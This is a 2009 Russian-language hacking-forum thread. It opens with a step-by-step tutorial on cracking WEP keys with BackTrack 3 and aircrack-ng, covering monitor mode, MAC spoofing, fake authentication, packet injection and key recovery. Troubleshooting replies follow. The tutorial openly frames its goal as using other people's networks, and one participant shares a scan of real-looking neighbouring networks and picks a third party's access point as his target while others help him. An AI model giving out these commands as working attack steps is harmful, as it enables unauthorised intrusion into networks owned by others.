Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Беспроводные технологии/WPAN/WLAN (https://forum.antichat.xyz/forumdisplay.php?f=113)
-   -   Взлом WEP с помощью BactTrack 3 (https://forum.antichat.xyz/showthread.php?t=107039)

jawbreaker 19.02.2009 20:32

Взлом WEP с помощью BactTrack 3
 
Для взлома WEP ключа нам понадобится:
- BactTrack 3
- подходящий wifi адаптер(список).
- Точка доступа с WEP-шифрованием
- Базовое знание терминов

.::Подготовка WIFI адаптера::.
Способ #1:
Набираем в консоли:
Код:

iwconfig
. В ответ будет что-то вроде:
Код:

bt ~ # iwconfig
lo no wireless extensions.

wifi0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"homenet" Nickname:""
Mode:Managed Frequency:2.437 GHz Access Point: 00:17:9A:26:8C:0E
Bit Rate:18 Mb/s Tx-Power:15 dBm Sensitivity=1/1
Retryff RTS thrff Fragment thrff
Encryption key:1234-5678-99 Security modepen
Power Managementff
Link Quality=18/70 Signal level=-78 dBm Noise level=-96 dBm
Rx invalid nwid:5601 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Как видим, карточка находится в управляемом режиме -
чтобы взломать сеть нужно перевести её в режим мониторинга. Для этого пишем:
Код:

wlanconfig ath1 create wlandev wifi0 wlanmode monitor
Всё, осталось сменить mac-адрес и можно переходить к следующему этапу, подставляя вместо [device] и [interface] ath1.

Способ #2:
Код:

iwconfig
Выдаст вам имя интерфейса беспроводного адаптера. Затем нужно остановить адаптер:
Код:

airmon-ng stop [device]
Затем:
Код:

ifconfig down [interface]
Теперь нужно поменять MAC адрес адаптера:
Код:

macchanger --mac 00:11:22:33:44:66 [device]
Настало время запустить адаптер в режиме мониторинга:
Код:

airmon-ng start [device]
http://thew0rd.com/wp-content/galler...n-ngstart1.png
.::Атакуем цель::.
Ищем сеть с WEP шифрованием командой:
Код:

airodump-ng [device]
http://thew0rd.com/wp-content/galler...odumpwifi0.png
Запишите MAC адрес сети(BSSID) ключ которой хотите найти , канал (CH) и имя (ESSID). Теперь нужно начинать собирать данные с точки доступа сети для атаки:
Код:

airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]
http://thew0rd.com/wp-content/galler...dumpoutput.png
Эта команда выведет данные в файл network.out. Затем нужно скормить этот файл другой программе и золотой ключик наш ;) .

Откройте другую консоль (оставив эту работать). Теперь нужно сгенерить поддельные пакеты чтобы заставить точку доступа передавать больше данных необходимых для поиска ключа. Протестируйте точку доступа следующей командой:
Код:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
http://thew0rd.com/wp-content/galler...ayfakeauth.png
Если всё прошло успешно можно начинать генерировать множество пакетов чтобы взломать WEP ключ:
Код:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
http://thew0rd.com/wp-content/galler...enerateivs.png

Это заставит точку доступа передать множество пакетов которые мы будем использовать для взлома ключа. Переключитесь на airodump-ng работающий в другой консоли и вы увидите как число "data" пакетов растет со временем.

http://thew0rd.com/wp-content/galler...ptureivs_0.png

После того как количество пакетов достигнет 10000-20000 (чем больше пакетов тем быстрее будет найден ключ) можно запускать aircrack.
Если не получается получить от точки доступа пакеты вышеописанным способом попробуйте ввести:
Код:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
http://thew0rd.com/wp-content/galler...ayattack2p.png

Теперь, когда вы собрали достаточное количество пакетов для взлома можно приступать собственно к взлому:
Код:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap
-n указывает на то что ключ 128ми битный (может быть 64 битным).
http://thew0rd.com/wp-content/galler...ck/crackng.png
Всё, ключ найден можно выходить в интернет с помощью чужой сети ;)

Источник

Переведено и дополнено jawbreaker специально для Античат.ру!

mikhoni 20.02.2009 01:40

на самом деле я вызываю
aircrack-ng *.cap
и не парюсь, да и для вепа можно параметр -i поставить, тогда собирать будет только ключи инициализации (IVs) файлы тогда будут сохраняться как *.ivs

XENON4IK 20.02.2009 02:58

Люди явно отстают от жизни))) ставим spoonwep2 и весь взлом упрощается до неузноваемости) пару кликов и через 5 минут у тебя уже ключик) конечно иногда попадаются такие сети где без рук не обойтись, но это редкость))

Black.Cat 28.02.2009 22:53

ifconfig down [interface] - что должно быть вместо [interface]?

svesve 28.02.2009 23:17

Цитата:

Сообщение от Black.Cat
ifconfig down [interface] - что должно быть вместо [interface]?

название твоего сетевого интерфейса

в случае с wi-fi ath0
в случае с ethrnet eth0

Black.Cat 01.03.2009 00:18

У меня карта Intel, вместо [device] писал wlan0.. Помоему карты Atheros определяются как ath0 ?..

karlsn 05.03.2009 03:15

2 способа нагона пакетов не срабатывают ... Это из за чего может быть ? адаптер Edimax EW-7318USG

karlsn 05.03.2009 03:20

http://img65.imageshack.us/img65/1223/ss1.jpg

http://img258.imageshack.us/img258/8826/ss3.jpg


http://img527.imageshack.us/img527/8169/ss2x.jpg

Stradi 06.03.2009 20:58

Основная проблема в том, что сначала нужно провести фейковую авторизацию, а потом нагонять пакеты.

karlsn 06.03.2009 23:23

хмммм... может на AP стоит mac фильтр , хотя я на 3 точки генил.
карта моожет ешё .... :confused:

Vub 11.03.2009 20:58

У меня тоже самое с Orient XG701A. Правда иногда ловит ACKи , но не ловит ARP запросы.
У АР, видимо, сигнал мощнее вот она и ловится со своими ACKами. А ARP-запросы ассоциированного клиента похоже просто не ловятся из-за слабого сигнала => поэтому и идет лесом весь инъект.

Я, правда, не уверен. Может у кого еще есть мысли?

jawbreaker 11.03.2009 21:04

Да, вы правы основная проблема это слабый сигнал.

Black.Cat 12.03.2009 18:56

А для Kismet есть инструкции?

socrates 16.04.2009 15:47

karlsn перед тем как проводить атаку -3 или -2
сначала нужно что бы атка -1 прошла успешно
Код:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
на твоем последнем скрине видно что под AUTH нет ничего а должно стоять OPN в случае успешной аутентификации , тогда можно и генерить пакеты
я тоже использую карту Edimax EW-7318USG , с атакой -1 тоже траблы ... хотя наверно дело не в карте а в АРах ... так как некоторые точки доступа открываются с первого раза , некоторые иногда , а иные никак не хотят .

_SEREGA_ 16.04.2009 16:44

Цитата:

Сообщение от socrates
karlsn перед тем как проводить атаку -3 или -2
сначала нужно что бы атка -1 прошла успешно
Код:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
на твоем последнем скрине видно что под AUTH нет ничего а должно стоять OPN в случае успешной аутентификации , тогда можно и генерить пакеты
я тоже использую карту Edimax EW-7318USG , с атакой -1 тоже траблы ... хотя наверно дело не в карте а в АРах ... так как некоторые точки доступа открываются с первого раза , некоторые иногда , а иные никак не хотят .

Да, у меня также! надо аутиентифицироваться (-1) а только потом генерить пакеты, иначе толку от них 0

у меня точка ловится с wep и никак не хочет открываться (-1) хотя тест inj (-9) отличный!
а другие dlink очень хорошо открываются!(-1)
зависит от ТД!

evgenst 17.04.2009 15:55

хм, столкнулся со странной ситуацией: вместо essid строчка вида <length: 9>
есть мысли по этому поводу?

Stradi 17.04.2009 17:52

(Моё предположение) Что это точки со старыми прошивками, или что-то в этом роде. Т.е. на точке стоит "Hide", но длина имени передается. По идее, ничем не отличается от обычной 0, только с длиной. Скорее всего сделано для того (отображение), чтобы можно было подбирать ссид, при необходимости.

Alexus 17.04.2009 19:10

Это тип настройки, в настройках при скрытии можно указать скрывать длину essid или не скрывать. Это писалось в Xakep Спец (номер про беспроводные сети)

neznajut 30.08.2009 21:16

EW-7318USG

bt ~ # wlanconfig ath1 create wlandev wifi0 wlanmode monitor
wlanconfig: ioctl: no such device

Что ему не понравилось?

4ikotillo 31.08.2009 03:33

Цитата:

Сообщение от neznajut
EW-7318USG

bt ~ # wlanconfig ath1 create wlandev wifi0 wlanmode monitor
wlanconfig: ioctl: no such device

Что ему не понравилось?

Попробуй заменить ath1 на ath0.

Или так

Цитата:

bt ~ # airmon-ng stop ath0
bt ~ # airmon-ng start wifi0
Должно получиться

neznajut 03.09.2009 12:42

Да вот не получается. Выложу полный вывод всех операций. Теперь уже с убунты с установлеными madwifi и aircrack.ng. Пока результаты(выводы) одинаковы, что на bt, что на убунте. По этому позволил себе немного самодеятельности в осях.

Цитата:

e@Dana:~$ iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

vboxnet0 no wireless extensions.

pan0 no wireless extensions.

wmaster0 no wireless extensions.

wlan0 IEEE 802.11bg ESSID:""
Mode:Managed Frequency:2.432 GHz Access Point: Not-Associated
Tx-Power=9 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Цитата:

e@Dana:~$ wlanconfig ath1 create wlandev wifi0 wlanmode monitor
wlanconfig: ioctl: No such device
Цитата:

e@Dana:~$ wlanconfig ath0 create wlandev wifi0 wlanmode monitor
wlanconfig: ioctl: No such device
Цитата:

root@Dana:~# airmon-ng stop ath0


Interface Chipset Driver

wlan0 Ralink 2573 USB rt73usb - [phy5]
Цитата:

root@Dana:~# airmon-ng start wifi0


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
2780 NetworkManager
2787 wpa_supplicant
2804 avahi-daemon
2805 avahi-daemon
3121 dhclient


Interface Chipset Driver

wlan0 Ralink 2573 USB rt73usb - [phy5]
Способ первый мне казался проще, т.к. у второго я не знаю откуда взялся mac 00:11:22:33:44:66?

4ikotillo 03.09.2009 23:13

Цитата:

Сообщение от neznajut
Да вот не получается. Выложу полный вывод всех операций. Теперь уже с убунты с установлеными madwifi и aircrack.ng. Пока результаты(выводы) одинаковы, что на bt, что на убунте. По этому позволил себе немного самодеятельности в осях.







Способ первый мне казался проще, т.к. у второго я не знаю откуда взялся mac 00:11:22:33:44:66?

Чтож ты раньше не сказал, что у тебя чипсет от Ralink)))

Тогда порядок таков:
Цитата:

bt ~ # airmon-ng start wlan0

Interface Chipset Driver

wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)
Она появиться у тебя в режиме mon0, далее по старинке:

Цитата:

bt ~ # airodump-ng mon0
Все остальное по мануалам)))

neznajut 08.11.2009 20:12

Цитата:

Все остальное по мануалам)))
Спасибо, тогда продолжаю.)))

Ну значит так:
Код:

airodump-ng mon0
скрин
Вывод:
Цитата:

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:40:96:5A:1C:F8 -1 0 16 0 148 -1 OPN <length: 0>
00:23:F8:A2:7B:0E -71 95 377 43 6 54e. WPA2 CCMP PSK E
00:0C:42:26:4B:B5 -71 83 0 0 1 54 . OPN 5NET.NUPAKY
00:23:CD:F4:CF:7C -76 73 0 0 3 54 . WEP WEP 269
02:0B:6B:09:F6:9E -78 51 0 0 5 11 . OPN www.vasesit.cz-hs-24335
00:0B:6B:09:F6:9E -77 57 43 0 5 11 . OPN www.vasesit.cz-24335
00:24:D2:3C:B2:70 -79 56 0 0 6 54e WEP WEP 73d1d39
00:21:27:E0:35:D2 -78 78 81 0 1 11 . WEP WEP Svedova-interconnect
00:02:72:73:82:74 -83 17 0 0 1 54 WEP WEP 259
00:24:D2:59:C5:BA -1 0 9 0 158 -1 WEP WEP <length: 0>

BSSID STATION PWR Rate Lost Packets Probes

00:40:96:5A:1C:F8 00:0A:59:42:5D:5F -77 0 -11 0 13
00:40:96:5A:1C:F8 00:0A:59:42:5B:99 -83 0 - 5 0 3
(not associated) 00:0B:6B:81:BF:32 -83 0 - 1 0 1 5NET.NUPAKY.2
00:23:F8:A2:7B:0E 00:25:D3:48:38:13 -57 5e- 5e 215 384 E
00:0C:42:26:4B:B5 00:0A:59:42:43:52 -1 1 - 0 0 16
00:0C:42:26:4B:B5 00:02:72:56:6B:42 -1 11 - 0 0 4
00:23:CD:F4:CF:7C 00:14:A5:7D:4A:85 -81 0 - 1 130 9 269
00:0B:6B:09:F6:9E 00:30:4F:55:BB:A4 -1 11 - 0 0 15
00:21:27:E0:35:D2 00:1E:65:7E:F5:C8 -83 11 - 1 0 105
00:24:D2:59:C5:BA 00:1F:1F:3D:B2:57 -75 0 - 1 0 60
Скажем я выбрал 00:21:27:E0:35:D2 -78 78 81 0 1 11 . WEP WEP Svedova-interconnect

Теперь (по мануалу) команда airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device], значит я далжен написать(?):
Код:

root@Dana:~# airodump-ng -c 1 -w network.out –bssid 00:21:27:E0:35:D2 mon0
или
Код:

root@Dana:~# airodump-ng -c 1 -w network.out –bssid 00:21:27:E0:35:D2 mon0
но получаю
Цитата:

"airodump-ng --help" for help.
Где я ощибся, господа?

Benya-13 09.11.2009 00:08

попробуй так root@Dana:~# airodump-ng -c 1 -w network.out --bssid 00:21:27:E0:35:D2 mon0

neznajut 09.11.2009 10:47

Цитата:

Сообщение от Benya-13
попробуй так root@Dana:~# airodump-ng -c 1 -w network.out --bssid 00:21:27:E0:35:D2 mon0

Вроде пошло, но в итоге результат
Код:

root@Dana:~# aircrack-ng -n 128 -b 00:21:27:E0:35:D2 network.out-01.cap
Opening network.out-01.cap
Got no data packets from target network!


Quitting aircrack-ng...

Что я мог сделать не так?

neznajut 09.11.2009 20:56

Цитата:

Сообщение от neznajut
Вроде пошло, но в итоге результат
Код:

root@Dana:~# aircrack-ng -n 128 -b 00:21:27:E0:35:D2 network.out-01.cap
Opening network.out-01.cap
Got no data packets from target network!


Quitting aircrack-ng...

Что я мог сделать не так?

Наверно глупость какая то. Буду пока пробовать.

теща 11.11.2009 06:26

Цитата:

Сообщение от neznajut
Наверно глупость какая то. Буду пока пробовать.

тема выше бт4 там на много проще ,
2. а ты вот так по пробуй
Цитата:

aircrack-ng -b 00:21:27:E0:35:D2 capture*.cap


Время: 13:50